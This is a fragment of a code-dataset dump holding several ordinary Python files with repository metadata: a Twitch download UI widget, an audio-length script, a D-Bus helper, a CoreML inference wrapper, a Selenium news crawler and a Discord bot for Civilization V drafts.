parent=self)\n\n def editScheduledDownload(self) -> None:\n scheduledDownloadSettings = Ui.ScheduledDownloadSettings(self.scheduledDownload.preset, parent=self)\n scheduledDownloadSettings.scheduledDownloadUpdated.connect(self.scheduledDownload.updateChannelData, QtCore.Qt.ConnectionType.QueuedConnection)\n scheduledDownloadSettings.exec()\n\n def tryRemoveScheduledDownload(self) -> None:\n if self.scheduledDownload.isActive():\n if self.scheduledDownload.status.isDownloading():\n if not Utils.ask(*Messages.ASK.STOP_DOWNLOAD, parent=self):\n return\n self.scheduledDownload.setEnabled(False)\n self._widgetRemoveController.registerRemove()\n self.setEnabled(False)\n\n def removeScheduledDownload(self) -> None:\n App.ScheduledDownloadManager.remove(self.scheduledDownloadId)", "repo_name": "devhotteok/TwitchLink", "sub_path": "Ui/ScheduledDownloadPreview.py", "file_name": "ScheduledDownloadPreview.py", "file_ext": "py", "file_size_in_byte": 10137, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 287, "dataset": "github-code", "pt": "53", "api": [{"api_name": "uuid.UUID", "line_number": 14, "usage_type": "attribute"}, {"api_name": "Download.Downloader.Core.StreamDownloader.StreamDownloader", "line_number": 17, "usage_type": "name"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.WidgetRemoveController", "line_number": 18, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.DownloadViewControlBar", "line_number": 21, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController", "line_number": 21, "usage_type": "name"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.DownloaderView", "line_number": 22, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController", "line_number": 22, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.ASK", "line_number": 60, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 60, "usage_type": "name"}, {"api_name": "Download.ScheduledDownloadPreset.Exceptions", "line_number": 75, "usage_type": "attribute"}, {"api_name": "Download.ScheduledDownloadPreset", "line_number": 75, "usage_type": "name"}, {"api_name": "Download.Downloader.Core.StreamDownloader.StreamDownloader", "line_number": 85, "usage_type": "name"}, 
{"api_name": "Services.Twitch.GQL.TwitchGQLModels.Channel", "line_number": 129, "usage_type": "call"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels", "line_number": 129, "usage_type": "name"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels.Stream", "line_number": 137, "usage_type": "attribute"}, {"api_name": "Services.Twitch.GQL.TwitchGQLModels", "line_number": 137, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.INFO", "line_number": 165, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 165, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.INFO", "line_number": 171, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 171, "usage_type": "name"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController.ScheduledDownloadSettings", "line_number": 174, "usage_type": "call"}, {"api_name": "Ui.Components.Widgets.WidgetRemoveController", "line_number": 174, "usage_type": "name"}, {"api_name": "Services.Messages.Messages.ASK", "line_number": 181, "usage_type": "attribute"}, {"api_name": "Services.Messages.Messages", "line_number": 181, "usage_type": "name"}]}
+{"seq_id": "9666691237", "text": "import os\nimport librosa\n\n# Đường dẫn đến thư mục chứa các file âm thanh\naudio_folder = '/root/Datasets/CREMA-D/Features/audios'\n\n# Khởi tạo biến để lưu thông tin về file âm thanh ngắn nhất\nshortest_duration = float('inf') # Đặt giá trị ban đầu là vô cùng lớn\nshortest_audio_file = None\n\n# Duyệt qua các file trong thư mục\nfor filename in os.listdir(audio_folder):\n if filename.endswith('.wav'): # Chỉ xử lý các file có định dạng .wav (hoặc tùy chọn định dạng khác)\n file_path = os.path.join(audio_folder, filename)\n \n # Lấy độ dài của file âm thanh\n audio, sr = librosa.load(file_path)\n audio_duration = len(audio) / sr\n \n # Kiểm tra nếu độ dài nhỏ hơn độ dài ngắn nhất hiện tại\n if audio_duration < shortest_duration:\n shortest_duration = audio_duration\n shortest_audio_file = filename\n\n# In ra thông tin về file âm thanh ngắn nhất\nprint('Shortest audio file:', shortest_audio_file)\nprint('Duration:', shortest_duration, 'seconds')\n", "repo_name": "cxnam-vnuhcmus/AFIF", "sub_path": "Audio_Preprocessing.py", "file_name": "Audio_Preprocessing.py", "file_ext": "py", "file_size_in_byte": 1134, "program_lang": "python", "lang": "vi", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.listdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "librosa.load", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "36725419999", "text": "import os\nimport weakref\nimport decorator\nimport inspect\nimport dbus.service\nimport threading\nfrom gi.repository import GLib\nfrom becv_utils import print_except, printb, printr, printg\n\nclass BEC5DBusObj(dbus.service.Object):\n obj_path = '/org/yyc_arch/becv'\n def __init__(self, mgr):\n self.__mgr = weakref.ref(mgr)\n dbus.service.Object.__init__(self, mgr.conn, self.obj_path)\n @property\n def becv_manager(self):\n return self.__mgr()\n @classmethod\n def method(cls, *a, error_ret=False, threaded=False, **kw):\n if threaded:\n dbus_deco = dbus.service.method(*a, async_callbacks=('_reply_hdl',\n '_error_hdl'),\n **kw)\n else:\n dbus_deco = dbus.service.method(*a, **kw)\n def _deco(func):\n if threaded:\n def _func(self, *_args, _reply_hdl=None, _error_hdl=None):\n def __worker():\n try:\n res = func(self, *_args)\n except:\n print_except()\n res = error_ret\n ctx = GLib.main_context_default()\n ctx.invoke_full(0, _reply_hdl, res)\n thread = threading.Thread(target=__worker, daemon=True)\n thread.start()\n func_fmt = ('%s(%s, _reply_hdl=None, _error_hdl=None)')\n func_fmt2 = ('_func(%s, _reply_hdl=_reply_hdl, '\n '_error_hdl=_error_hdl)')\n else:\n def _func(self, *_args):\n try:\n return func(self, *_args)\n except:\n print_except()\n return error_ret\n func_fmt = '%s(%s)'\n func_fmt2 = '_func(%s)'\n eval_dict = {'_func': _func}\n args_sig = ', '.join(inspect.getfullargspec(func)[0])\n name = func.__name__\n _func = decorator.FunctionMaker.create(\n func_fmt % (name, args_sig),\n 'return ' + func_fmt2 % args_sig, eval_dict)\n return dbus_deco(_func)\n return _deco\n\nclass BEC5DBusFmtObj(BEC5DBusObj):\n obj_path_fmt = '/org/yyc_arch/becv/%d'\n def __init__(self, mgr, *args):\n self.obj_path = self.obj_path_fmt % args\n BEC5DBusObj.__init__(self, mgr)\n", "repo_name": "bec5-group/bec5-web", "sub_path": "becv_dbus/utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2506, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dbus.service.service", "line_number": 10, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 10, "usage_type": "name"}, {"api_name": "weakref.ref", "line_number": 13, "usage_type": "call"}, {"api_name": "dbus.service.service.Object.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "dbus.service.service", "line_number": 14, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 14, "usage_type": "name"}, {"api_name": "dbus.service.service.method", "line_number": 21, "usage_type": "call"}, {"api_name": "dbus.service.service", "line_number": 21, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 21, "usage_type": "name"}, {"api_name": "dbus.service.service.method", "line_number": 25, "usage_type": "call"}, {"api_name": "dbus.service.service", "line_number": 25, "usage_type": "attribute"}, {"api_name": "dbus.service", "line_number": 25, "usage_type": "name"}, {"api_name": "becv_utils.print_except", "line_number": 33, "usage_type": "call"}, {"api_name": "gi.repository.GLib.main_context_default", "line_number": 35, "usage_type": "call"}, {"api_name": "gi.repository.GLib", "line_number": 35, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 37, "usage_type": "call"}, {"api_name": "becv_utils.print_except", "line_number": 47, "usage_type": "call"}, {"api_name": "inspect.getfullargspec", "line_number": 52, "usage_type": "call"}, {"api_name": 
"decorator.FunctionMaker.create", "line_number": 54, "usage_type": "call"}, {"api_name": "decorator.FunctionMaker", "line_number": 54, "usage_type": "attribute"}]}
+{"seq_id": "13920105721", "text": "from typing import Dict\n\nimport coremltools as ct\nimport numpy as np\nimport torch\n\nfrom mmdeploy.utils import Backend\nfrom mmdeploy.utils.timer import TimeCounter\nfrom ..base import BACKEND_WRAPPER, BaseWrapper\n\n\n@BACKEND_WRAPPER.register_module(Backend.COREML.value)\nclass CoreMLWrapper(BaseWrapper):\n \"\"\"CoreML wrapper class for inference.\n\n Args:\n model_file (str): Path of a mlpackage file.\n bin_file (str): Path of a binary file.\n\n Examples:\n >>> from mmdeploy.backend.coreml import CoreMLWrapper\n >>> import torch\n >>>\n >>> model_file = 'model.mlpackage'\n >>> model = CoreMLWrapper(model_file)\n >>> inputs = dict(input=torch.randn(1, 3, 224, 224))\n >>> outputs = model(inputs)\n >>> print(outputs)\n \"\"\"\n\n def __init__(self, model_file: str):\n self.model = ct.models.model.MLModel(\n model_file, compute_units=ct.ComputeUnit.ALL)\n spec = self.model.get_spec()\n output_names = [out.name for out in spec.description.output]\n super().__init__(output_names)\n\n def forward(self, inputs: Dict[str,\n torch.Tensor]) -> Dict[str, torch.Tensor]:\n \"\"\"Run forward inference.\n\n Args:\n inputs (Dict[str, torch.Tensor]): Key-value pairs of model inputs.\n\n Returns:\n Dict[str, torch.Tensor]: Key-value pairs of model outputs.\n \"\"\"\n model_inputs = dict(\n (k, v.detach().cpu().numpy()) for k, v in inputs.items())\n output = self.__execute(model_inputs)\n for name, tensor in output.items():\n output[name] = torch.from_numpy(tensor)\n return output\n\n @TimeCounter.count_time(Backend.COREML.value)\n def __execute(self, inputs: Dict[str, np.ndarray]) -> Dict:\n \"\"\"Run inference with CoreML.\n\n Args:\n inputs (Dict[str, np.ndarray]): Input data with keys.\n\n Returns:\n Dict[str, np.ndarray]: Inference results with keys.\n \"\"\"\n return self.model.predict(inputs)\n", "repo_name": "open-mmlab/mmdeploy", "sub_path": "mmdeploy/backend/coreml/wrapper.py", "file_name": "wrapper.py", "file_ext": "py", "file_size_in_byte": 2062, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2256, "dataset": "github-code", "pt": "53", "api": [{"api_name": "base.BaseWrapper", "line_number": 13, "usage_type": "name"}, {"api_name": "coremltools.models.model.MLModel", "line_number": 32, "usage_type": "call"}, {"api_name": "coremltools.models", "line_number": 32, "usage_type": "attribute"}, {"api_name": "coremltools.ComputeUnit", "line_number": 33, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 39, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 56, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.timer.TimeCounter.count_time", "line_number": 55, "usage_type": "call"}, {"api_name": "mmdeploy.utils.timer.TimeCounter", "line_number": 55, "usage_type": "name"}, {"api_name": "mmdeploy.utils.Backend.COREML", "line_number": 55, "usage_type": "attribute"}, {"api_name": "mmdeploy.utils.Backend", "line_number": 55, "usage_type": "name"}, {"api_name": "base.BACKEND_WRAPPER.register_module", "line_number": 12, "usage_type": "call"}, {"api_name": "base.BACKEND_WRAPPER", "line_number": 12, "usage_type": "name"}, {"api_name": "mmdeploy.utils.Backend.COREML", "line_number": 12, "usage_type": "attribute"}, 
{"api_name": "mmdeploy.utils.Backend", "line_number": 12, "usage_type": "name"}]}
+{"seq_id": "43583860094", "text": "# -*- coding: utf-8 -*-\n\nimport time, datetime, re, hashlib, os, sys\nfrom time import sleep\nfrom selenium.common.exceptions import NoSuchElementException, NoSuchAttributeException, TimeoutException\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\n# import crawlerfun\n\nclass Cyol:\n def __init__(self, d):\n timeStamp = time.time()\n timeArray = time.localtime(timeStamp)\n self.date = time.strftime('%Y-%m-%d %H:%M:%S', timeArray)\n self.projectName = 'food'\n self.d = d\n self.dir = self._dir = self.source = ''\n self.debug = True\n\n\n def crawl(self):\n print('\\n', '-' * 10, 'http://cyol.com/', '-' * 10, '\\n')\n self.i = self.total = 0\n self.browser = webdriver.Firefox()\n self.browser.set_window_position(x = 630, y = 0)\n n = 0\n\n webLst = [\n 'http://qnck.cyol.com/',\n 'http://zqb.cyol.com/',\n 'http://qnzj.cyol.com/',\n 'http://qnsx.cyol.com/']\n\n for url in webLst:\n self.i = 0\n try:\n self.browser.get(url)\n sleep(5)\n except TimeoutException:\n return\n\n\n pageList = self.browser.find_elements(by = By.CSS_SELECTOR, value = 'div#pageList > ul > li')\n print(len(pageList))\n for i in range(len(pageList)):\n item = self.browser.find_elements(by = By.CSS_SELECTOR, value = 'div#pageList > ul > li')[i]\n listName = item.find_element(by = By.TAG_NAME, value = 'a').text\n\n itemList = self.browser.find_elements(by = By.CSS_SELECTOR, value = '#titleList > ul > li')\n for j in range(len(itemList) - 1):\n if self.i == 0:\n self.browser.find_element(by = By.CSS_SELECTOR, value = '#titleList > ul > li:nth-child(1)').click()\n\n self.extract()\n try:\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '下一篇').click()\n except NoSuchElementExccomnewseption:\n print('click return')\n self.i = 0\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '返回目录').click()\n\n continue\n if '01版' in listName:\n if self.i == 0:\n self.browser.find_element(by = By.CSS_SELECTOR, value = '#titleList > ul > li:nth-child(1)').click()\n\n self.extract()\n try:\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '下一篇').click()\n except NoSuchElementException:\n self.i = 0\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '返回目录').click()\n else:\n item.find_element(by = By.TAG_NAME, value = 'a').click()\n if self.i == 0:\n self.browser.find_element(by = By.CSS_SELECTOR, value = '#titleList > ul > li:nth-child(1)').click()\n\n self.extract()\n try:\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '下一篇').click()\n except NoSuchElementException:\n self.i = 0\n self.browser.find_element(by = By.PARTIAL_LINK_TEXT, value = '返回目录').click()\n\n\n\n if self.total > 0:\n # self.rename()\n # self.expire()\n\n return self.total\n else:\n return 0\n\n\n # 提取信息,一条的\n def extract(self):\n try:\n link = self.browser.current_url\n md5 = self.makeMD5(link)\n\n # dict filter\n if md5 in self.d:\n return\n else:\n self.d[md5] = self.date.split(' ')[0] # 往dict里插入记录\n self.i += 1\n self.total += 1\n\n title = self.browser.find_element(By.CSS_SELECTOR, value = 'div.list_t > div > h1').text\n\n self.source = self.getPageText()\n\n print(link, title)\n sleep(1)\n # self.write_new_file(link, title, self.source, self.i, self.date, 855436)\n except (NoSuchElementException, NoSuchAttributeException) as e:\n print('Element error:', e)\n except 
Exception:\n return\n\n\n def getPageText(self, ): # 获取网页正文\n try:\n html = self.browser.find_element(By.CSS_SELECTOR, value = 'div#ozoom').get_attribute('innerHTML')\n except NoSuchElementException:\n html = self.browser.page_source\n\n return html\n\n\n # 生成md5信息\n def makeMD5(self, link):\n m = hashlib.md5()\n b = link.encode(encoding = 'utf-8')\n m.update(b)\n enc = m.hexdigest()\n\n return enc\n\n\nif __name__ == '__main__':\n chanye = Cyol({})\n chanye.crawl()\n", "repo_name": "tonyhauuk/Non-project", "sub_path": "crawl/hangye_web/cyol/cyol.py", "file_name": "cyol.py", "file_ext": "py", "file_size_in_byte": 5236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "time.time", "line_number": 15, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 16, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 17, "usage_type": "call"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 27, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 27, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 42, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 46, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 46, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 49, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 49, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 50, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 50, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 52, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 55, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 55, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 59, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 63, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 63, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 68, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 68, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 72, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 72, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 73, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 75, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 75, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.TAG_NAME", "line_number": 77, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", 
"line_number": 77, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 79, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 79, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 83, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 83, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 84, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.PARTIAL_LINK_TEXT", "line_number": 86, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 86, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 113, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 113, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 118, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 120, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchAttributeException", "line_number": 120, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 128, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 128, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.NoSuchElementException", "line_number": 129, "usage_type": "name"}, {"api_name": "hashlib.md5", "line_number": 137, "usage_type": "call"}]}
+{"seq_id": "69793698087", "text": "\"\"\"\n# Civilization V - Drafter\n# Description: A simple Discord Bot for Civilization V Multiplayer Drafts.\n# Author: Mehmet YILDIZ\n# Version/Date: 220727\n# License: MIT License.\n\"\"\"\n\n#region IMPORTS\n####### ####### #######\n# System Imports\nimport os\nfrom dotenv import load_dotenv\n# Discord Imports\nimport discord\nfrom discord.commands import option\n# In-House Imports\nimport gamedata\nfrom gamelobby import GameLobby\n# Other\nimport random\n#endregion\n\n#region INITIALIZATION\n####### ####### #######\n\n# Initialize Environment Values\nload_dotenv()\nTOKEN = os.getenv(\"DISCORD_TOKEN\")\nGID = os.getenv(\"DISCORD_GID\")\n\n# Initialize Intents, for easier expansion.ß\nintents = discord.Intents.default()\nintents.members = True \nintents.message_content = True\n\n# Initialize the Bot\nbot = discord.Bot(debug_guilds=[GID], intents=intents)\n\n# Log into Discord and Report Status\n@bot.event\nasync def on_ready():\n print(f\"Logged in as {bot.user} (ID: {bot.user.id})\")\n print(\"------\")\n\n# Create Active Lobby for the Game\nlobbies = {}\n\ndef get_lobby(gid: int):\n \"\"\"\n Returns the active lobby for the given the Guild ID.\n\n :param gid: Guild ID\n :returns: Active GameLobby\n \"\"\"\n\n if gid in lobbies.keys():\n return lobbies.get(gid)\n else:\n # Else create a placeholder lobby for the requested Guild.\n # Effectively the same as using /ng command.\n lobbies.update({gid : GameLobby(gid, 4, 2, 3)})\n return lobbies.get(gid) \n#endregion\n\n#region AUTO-COMPLETE METHODS\n####### ####### #######\n# Methods that autocomplete user input in DC.\n\n# Searchers (that list all items in a given list)\nasync def ac_civ_searcher(ctx: discord.AutocompleteContext, \ndescription=\"Returns a list of matching civilizations from CIVILIZATIONS.\"):\n return [civ for civ in gamedata.CIVILIZATIONS]\n\nasync def ac_tier_searcher(ctx: discord.AutocompleteContext,\ndescription=\"Returns a list of matching tiers from TIERS.\"):\n return [tier for tier in gamedata.TIERS]\n\nasync def ac_pool_searcher(ctx: discord.AutocompleteContext,\ndescription=\"Returns a list of matching civilizations from the lobby pool.\"):\n return [civ for civ in get_lobby(ctx.interaction.guild.id).poolcivs()]\n\n# Filters (that filters items in a given list according to user input)\nasync def ac_civilizations(ctx: discord.AutocompleteContext):\n \"\"\"Returns a list of civilizations that begin with the characters entered so far.\"\"\"\n return [civ for civ in gamedata.CIVILIZATIONS if civ.startswith(ctx.value.capitalize())]\n\nasync def ac_pool(ctx: discord.AutocompleteContext):\n \"\"\"Returns a list of civilizations that begin with the characters entered so far from the lobby pool.\"\"\"\n return [civ for civ in (['Random'] + get_lobby(ctx.interaction.guild.id).poolcivs()) if civ.startswith(ctx.value.capitalize())]\n#endregion\n\n#region LOBBY COMMANDS\n####### ####### #######\n# Bot commands for lobby management.\n\nlobby = bot.create_group(name=\"lobby\", description=\"Commands related to the lobby creation.\")\n\n# LOBBY CREATION\n@lobby.command(name=\"ng\", description=\"Create a New GameLobby for Civilization V with optional ban/pick settings.\")\n@option(\"playercount\", description=\"How many players?\", min_value=1, max_value=8, type=int, required=True)\n@option(\"bancount\", description=\"How many bans per player?\", min_value=1, max_value=2, default=1, type=int, required=False)\n@option(\"pickcount\", description=\"How many picks per player?\", min_value=1, 
max_value=5, default=3, type=int, required=False)\nasync def ng(ctx: discord.ApplicationContext, playercount: int, bancount: int, pickcount: int):\n global lobbies\n lobbies.update({ctx.guild.id : GameLobby(ctx.guild.id, playercount, bancount, pickcount)})\n await ctx.respond(f\"Initializing a new lobby...\\n\"+\n \"###### NEW GAME ######\\n\"\n f\"Created a new lobby for {get_lobby(ctx.guild.id).get_player_count()} players!\\n\"+\n f\"Each player can ban {get_lobby(ctx.guild.id).get_ban_count()} and pick {get_lobby(ctx.guild.id).get_pick_count()} civilizations.\\n\"+\n get_lobby(ctx.guild.id).ban_default())\n\n@lobby.command(name=\"info\", description=\"Print the GameLobby settings for players, bans, and picks.\")\nasync def info(ctx: discord.ApplicationContext):\n await ctx.respond(f\"Lobby Information: {get_lobby(ctx.guild.id).get_player_count()} Players, \" +\n f\"{get_lobby(ctx.guild.id).get_ban_count()} Bans, {get_lobby(ctx.guild.id).get_pick_count()} Picks.\")\n\n# PLAYER REGISTRATION\n@lobby.command(name=\"register\", description=\"Register for the active lobby.\")\nasync def register(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).register_player(ctx.author.mention)[1])\n\n@lobby.command(name=\"unregister\", description=\"Unregister from the active lobby.\")\nasync def unregister(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).unregister_player(ctx.author.mention))\n\n@lobby.command(name=\"lp\", description=\"Print the list of registered players within the active lobby.\")\nasync def list_players(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).get_players())\n\n# BANS\n@lobby.command(name=\"ban\", description=\"Ban a Civilization.\")\n@option(\"civ_one\", description=\"First civilization to ban.\", type=str, required=True, autocomplete=ac_pool)\n@option(\"civ_two\", description=\"Second civilization to ban.\", type=str, required=False, autocomplete=ac_pool)\nasync def ban(ctx: discord.ApplicationContext, civ_one: str, civ_two: str):\n # Format the input.\n civ_one = civ_one.capitalize()\n if (civ_two):\n civ_two = civ_two.capitalize()\n # Assign Random Civilizations if the user picked random.\n if civ_one == \"Random\":\n civ_one = get_lobby(ctx.guild.id).random_civ()\n if civ_two == \"Random\":\n civ_two = get_lobby(ctx.guild.id).random_civ()\n\n # Continue with the ban.\n if (not civ_two):\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_one)}\")\n else:\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_one)}\\n\"+\n f\"{get_lobby(ctx.guild.id).ban_civ(ctx.author.mention, civ_two)}\")\n\n@lobby.command(name=\"unban\", description=\"Unban a civilization that you banned.\")\n@option(\"civ_one\", description=\"First civilization to unban.\", type=str, required=True, autocomplete=ac_civilizations)\n@option(\"civ_two\", description=\"Second civilization to unban.\", type=str, required=False, autocomplete=ac_civilizations)\nasync def unban(ctx: discord.ApplicationContext, civ_one: str, civ_two: str):\n if (not civ_two):\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).unban_civ(ctx.author.mention, civ_one)}\")\n else:\n await ctx.respond(f\"UPDATE:\\n{get_lobby(ctx.guild.id).unban_civ(ctx.author.mention, civ_one)}\\n\"+\n f\"{get_lobby(ctx.guild.id).unban_civ(ctx.author.mention, civ_two)}\")\n\n@lobby.command(name=\"lc\", description=\"Print the list of civilizations in the pool.\")\nasync def pool(ctx: 
discord.ApplicationContext):\n result = \"AVAILABLE POOL\"\n for tier in get_lobby(ctx.guild.id).get_pool().keys():\n result += f\"\\nTier {tier}: {', '.join(get_lobby(ctx.guild.id).get_pool()[tier])}\"\n await ctx.respond(result)\n\n@lobby.command(name=\"lb\", description=\"Print the list of existing bans within the game lobby.\")\nasync def list_bans(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).get_bans())\n\n# PICKS\n@lobby.command(name=\"draft\", description=\"Create a new Draft from the available pool.\")\nasync def draft(ctx: discord.ApplicationContext):\n get_lobby(ctx.guild.id).draft()\n await ctx.respond(get_lobby(ctx.guild.id).get_picks())\n\n@lobby.command(name=\"rd\", description=\"Create a new Draft from the available pool.\")\nasync def re_draft(ctx: discord.ApplicationContext):\n get_lobby(ctx.guild.id).redraft()\n await ctx.respond(get_lobby(ctx.guild.id).get_picks())\n\n@lobby.command(name=\"ld\", description=\"Print the list of available picks for each player.\")\nasync def list_picks(ctx: discord.ApplicationContext):\n await ctx.respond(get_lobby(ctx.guild.id).get_picks())\n#endregion\n\n#region REFERENCE COMMANDS\n####### ####### #######\n# Bot commands for reference material.\n\nreference = bot.create_group(name=\"reference\", description=\"Commands related to Civilization 5 Information.\")\n\n@reference.command(name=\"tiers\", description=\"Print a list civilizations according to tiers.\")\nasync def learn_tiers(ctx: discord.ApplicationContext):\n await ctx.respond(gamedata.info_atc())\n\n@reference.command(name=\"tierfromciv\", description=\"Print the tier of a given civilization.\")\n@option(name=\"civ\", description=\"Which civilization are you looking for?\",\n autocomplete=discord.utils.basic_autocomplete(ac_civ_searcher), required=True)\nasync def tierfromciv(ctx: discord.ApplicationContext, civ: str):\n await ctx.respond(gamedata.info_tfc(civ))\n\n@reference.command(name=\"civsfromtier\", description=\"Print the civilizations in a given tier.\")\n@option(name=\"civ\", description=\"Which tier are you looking for?\",\n autocomplete=discord.utils.basic_autocomplete(ac_tier_searcher))\nasync def civsfromtier(ctx: discord.ApplicationContext, civ: str):\n await ctx.respond(gamedata.info_cft(civ)) \n\n#endregion\n\n#region GENERAL COMMANDS\n####### ####### #######\n# Bot commands for other stuff.\n\ngeneral = bot.create_group(name=\"general\", description=\"Commands related to nothing specific.\")\n\n@general.command(name=\"salute\", description=\"Salutes the author.\")\nasync def salute(ctx):\n await ctx.respond(f\"Hello {ctx.author.mention}!\")\n\n@general.command(name=\"rolldice\", description=\"Simulates roll of dice.\")\n@option(name=\"number_of_dice\", description=\"How many dice?\", min_value=1, max_value=8, default=2, required=True)\n@option(name=\"number_of_sides\", description=\"How many sides?\", min_value=2, max_value=60, default=6, required=True)\nasync def roll(ctx, number_of_dice: int, number_of_sides: int):\n dice = [\n str(random.choice(range(1, number_of_sides + 1)))\n for _ in range(number_of_dice)\n ]\n await ctx.respond(', '.join(dice))\n#endregion\n\n#region RUN THE BOT\n####### ####### #######\n# Run the bot, finally.\n\nbot.run(TOKEN)\n#endregion", 